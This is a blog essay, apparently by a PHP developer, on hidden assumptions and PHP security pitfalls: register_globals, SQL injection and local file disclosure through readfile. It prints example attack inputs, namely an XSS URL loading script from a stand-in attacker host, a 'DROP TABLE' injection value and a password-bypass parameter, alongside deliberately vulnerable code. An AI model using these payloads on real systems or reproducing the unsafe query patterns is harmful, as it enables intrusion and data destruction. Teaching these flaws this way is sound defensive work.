In short, Adobe is using a shareware-like model for distributing the Adobe Reader: you get a basic version for free, but to access the advanced features you have to pay. The difference with the standard shareware model is that “you”, in the above sentence, is not the user of the Adobe Reader software, but rather the author of the PDF that is read by that software.

What Does This Teach Us?

Two things:

  • Most assumptions that hold on an individual basis (on my computer, I use Acrobat Reader to open PDF documents) do not carry over well to other people. This is what leads to the “doesn’t work on other machines” portability issue, as well as many security issues when people cannot imagine that a hacker is going to use their program or website in a way they did not intend.
  • When someone does notice that an assumption is incorrect, and adds code to handle it, readers of that code will seldom understand on the first try what assumption is incorrect (precisely because, as an assumption, is it thought to be correct). Therefore, code handling some obscure detail will be thought as redundant and silly if it is not accompanied by a comment explaining why it’s actually necessary and not redundant.

The portability issue is annoying, but not horrible. After all, if you make an assumption that hinders portability, you will be woefully aware of that once you actually try to perform the port. By contrast, security issues are far more annoying. The classic issue would be SQL injection:

mysql_query("SELECT * FROM `users` ".
            "WHERE `id` = ".$_GET['user']." AND `password` = ".$_GET['pass']);

This code assumes that the GET-parameter will always be a valid user identifier. This may be fine if the visitors always come to the page after clicking on a link that contains a valid GET-parameter, but even an average hacker can forge an HTTP GET request with all an invalid GET-parameter such as ‘?user=13–” (this selects user 13 without password checks).

As for assuming that people are incorrect, I’d say there are three kind of developers:

  1. The young developer, who trusts everyone and accepts all the code as if it had been written by omniscient brain-gods.
  2. The experienced developer, who has learned that other developers are incompetent and warily examines all code as if it had been written by an epileptic chimpanzee.
  3. The wise developer, who has gone beyond mistrust into deep paranoia, and warily examines all code as if it had written by a sworn rival out to get him by placing devious traps in everything he commits.

Type 1 never notices bugs. Type 2 treats genuine corrections as bugs. Type 3 just spends too much time cross-checking everything to do any kind of work.

No single type is perfect, and in every team there will be a type that will be better than the others. If your team is highly competent, be a type 1 developer. If your team is highly incompetent, be a type 2 developer. If your team is a sworn rival out to get you, be a type 3 ;-)

More is Worse

Countless stories and folk tales relate the story of a man who sought or otherwise found boundless power, which proved too much to handle and ultimately destroyed him. Yet, what brought most of us to programming is the unmistakable feeling of omnipotence, the ability to make the machine do anything one desires provided that one can explain how to do it.

And, inevitably, the bitter taste of experience teaches us that omnipotence is the greatest curse that has ever befallen the computer programmer or the system administrator, leaving us to face the new generation of programmers who delight in the latest programming language version of the swiss army knife, favoring expressiveness over safety and security.

Much to my delight, PHP has been a historical breeding ground for such low-safety, low-security, low-verbosity solutions.

Automatic global variables

Perhaps the oldest and most delicate security issue in PHP was the automatic registration of request arguments as global variables. Consider the simple PHP script that displays a countdown in bold and italics:

assert (is_int($count)); 

while ($count > 0) 
  $result .= string($count--) . ", "; 

$result .= "Fire!"; 

echo '<p>In bold: <b>'.$result.'</b>.</p>';
echo '<p>In italics: <i>'.$result.'</i>.</p>';

This snippet uses two common productivity-enhancing features of the earlier PHP incarnations: the fact that variables could be used without being initialized (so $result is initially null, implicitly converted to the empty string, and then used) and the automatic registration of variables, allowing $count to equal what is now known as $_REQUEST['count'] (which could be provided, for instance, by accessing http://example.com/script.php?count=3).

Obviously, this creates huge vulnerabilities. For instance, a short piece of code such as the one above could very well contain an XSS (cross-site scripting) vulnerability! It’s enough for an attacker to find out that the script uses a variable named $result (fairly easy with open source software) and provide an initial value for it, for instance injecting some javascript on another page. The victim would be vulnerable when following an URL such as:

http://example.com/script.php?count=0&result=<script src=http://haxor.com/hax.js></script>

Now that the attacker has injected arbitrary JS in thevictim’s browser on the page that is being attacked, he can do anything as if he were the victim, using the victim’s session on the target site.

Needless to say, PHP has already restricted the use of automatic global registration to contain this evil.

SQL Queries

Yet another high-productivity improvement in PHP is its tight connection with the MySQL database management system. In the good old days when “real programmers” had to update an account balance in a database, they would write a stored SQL procedure which received the account balance as an argument and performed the correct manipulation, then they would write some web server code that connected to the database and called that stored procedure.

PHP allows its users to brutally shorten the amount of work necessary for that:

function update_balance($id, $amount)
{
  mysql_connect();
  mysql_query(
    "UPDATE accounts " .
    "SET balance = balance + $amount " .
    "WHERE id = $id");
}

This code works by generating an SQL query as a string, then sending that query over the connection to the MySQL database manager, which runs it as-is. This code contains a classic SQL injection vulnerability, where the attacker provides values of the $id or $amount variables that generate malicious SQL code. For instance, providing $amount = “0; DROP TABLE accounts; –” and $id = 0 results in the generated (and executed) SQL statements:

UPDATE accounts SET balance = balance + 0;
DROP TABLE accounts;
-- WHERE id = 0

Of course, this assumes that there are no other safety rules that filter out invalid values for $amount or $id (which must be integers). But when the data being stored is a bit of text, which should be stored as-is regardless of what it contains, the safety checks disappear and the vulnerability becomes apparent (and often exploited, sometimes in the least expected ways).

There are certainly workaround for this, the first of them being the existence of mysql_real_escape_query, which eliminates any risk of injection, provided that it is used, and it’s easy to forget using it (not to mention the overhead of using it). Many frameworks provide their own version of a query generator that automatically escapes query arguments. My own mini-framework involves:

$link = mysql_connect();
qprintf(
  $link, 
  "UPDATE accounts "
  . "SET balance = balance + {0} "
  . "WHERE id = {1}", 
  $amount, $id);

And the Zend Framework involves:

$select = $this 
  -> select()
  -> where('id = ?', $id); 

$row  = $this -> fetchRow($select);
$data = array('balance' => $row -> balance + $amount); 

$where = $this 
  -> getAdapter()
  -> quoteInto('id = ?', $id); 

$this 
  -> update($array, $where);

To account for the unsafety of the short version, more code has to be added.

Remote file access

In the beginning, accessing a remove file (for instance, at the other end of an http:// address) in PHP was a difficult task that involved manually connecting to the server to fetch the file (using cURL, for instance).

Then, the elementary file-opening function fopen gained the ability to open remote files with several protocols (and the possibility to add more).  Suddently, the old fifteen-line routine for reading the contents of an RSS feed became as simple as readfile(“http://example.com/rss.php”), and there was much rejoicing.

One thing led to another, and code using that feature began to multiply using patterns such as these:

function display_quoted($url)
{
  print '<blockquote>';
  @readfile($url);
  print '</blockquote>';
}

Except that, while readfile documented that it could open both local and remote files, display_quoted only documents that it can open remote files. And when a local path is passed to display_quoted, well, you’ve just output config.inc.php and the database passwords that were hidden in there.

The solution, of course, is to distinctly separate functions which operate on local files from functions which operate on remote files. It’s certainly possible to keep on using readfile to perform remote access, but additional checks should be made to guarantee that it’s performing remote access and note local access.



1170 feed subscribers
(readers who polled a feed this week)